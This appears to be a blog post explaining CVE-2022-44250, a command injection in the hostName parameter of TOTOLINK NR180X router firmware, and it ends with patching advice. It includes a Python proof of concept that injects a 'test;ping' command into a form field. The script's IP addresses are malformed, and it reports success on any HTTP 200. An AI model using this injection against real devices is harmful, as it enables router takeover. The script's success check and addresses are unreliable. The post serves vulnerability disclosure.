CVE-2022-44250 - TOTOLINK NR180X V9.1.u.6279_B20210910 Command Injection Vulnerability via setOpModeCfg function

A recent vulnerability has been discovered in TOTOLINK NR180X routers with the firmware version V9.1.u.6279_B20210910. The vulnerability, assigned CVE number CVE-2022-44250, involves a command injection that allows attackers to execute arbitrary commands on the affected device via the hostName parameter in the setOpModeCfg function. In this post, we'll discuss the details of the vulnerability, provide a code snippet to demonstrate the exploit, and share the original references for further information.

Exploit Details

The vulnerability stems from improper sanitization of the hostName parameter value passed to the setOpModeCfg function. An attacker can exploit this flaw by injecting malicious commands into the hostName parameter, which can then be executed on the router's system.

The malicious commands in the hostName parameter get executed, thus compromising the device.

The exploit could allow an attacker to gain unauthorized access to the router, steal sensitive information, or even launch further attacks on devices connected to the network.

Code Snippet

Here's a simple example of a Python script that demonstrates how to exploit this vulnerability using the popular requests library:

import requests

TARGET_IP = "192.168..1"  # Replace with the target router's IP address

# The payload contains the command injection, e.g., a simple 'ping' in this case
payload = "test;ping -c 3 192.168..100"

# Prepare the POST request to exploit the vulnerability
url = f"http://{TARGET_IP}/apply.cgi";
data = {"submit_flag": "opmodeCfg", "hostName": payload}
headers = {"Content-Type": "application/x-www-form-urlencoded"}

# Send the POST request
response = requests.post(url, data=data, headers=headers)

# Check if successful
if response.status_code == 200:
    print("Exploit successful!")
else:
    print("An error occurred:", response.text)

Remember to replace TARGET_IP with the actual IP address of the target router.

Original References

Additional information about the vulnerability, including the original disclosure and technical details, can be found in the following resources:

1. MITRE's CVE listing for CVE-2022-44250
2. NVD's listing for CVE-2022-44250

Conclusion

In summary, CVE-2022-44250 is a critical vulnerability in TOTOLINK NR180X routers, which could enable an attacker to execute arbitrary commands on the affected device. Users are advised to apply any security updates or patches provided by TOTOLINK to mitigate the risk associated with this vulnerability.

If you believe your router may be affected, contact TOTOLINK's support for further information and guidelines on how to protect your device. Stay vigilant, and always keep your devices up to date with the latest security updates!

Timeline

Published on: 11/23/2022 16:15:00 UTC
Last modified on: 08/08/2023 14:22:00 UTC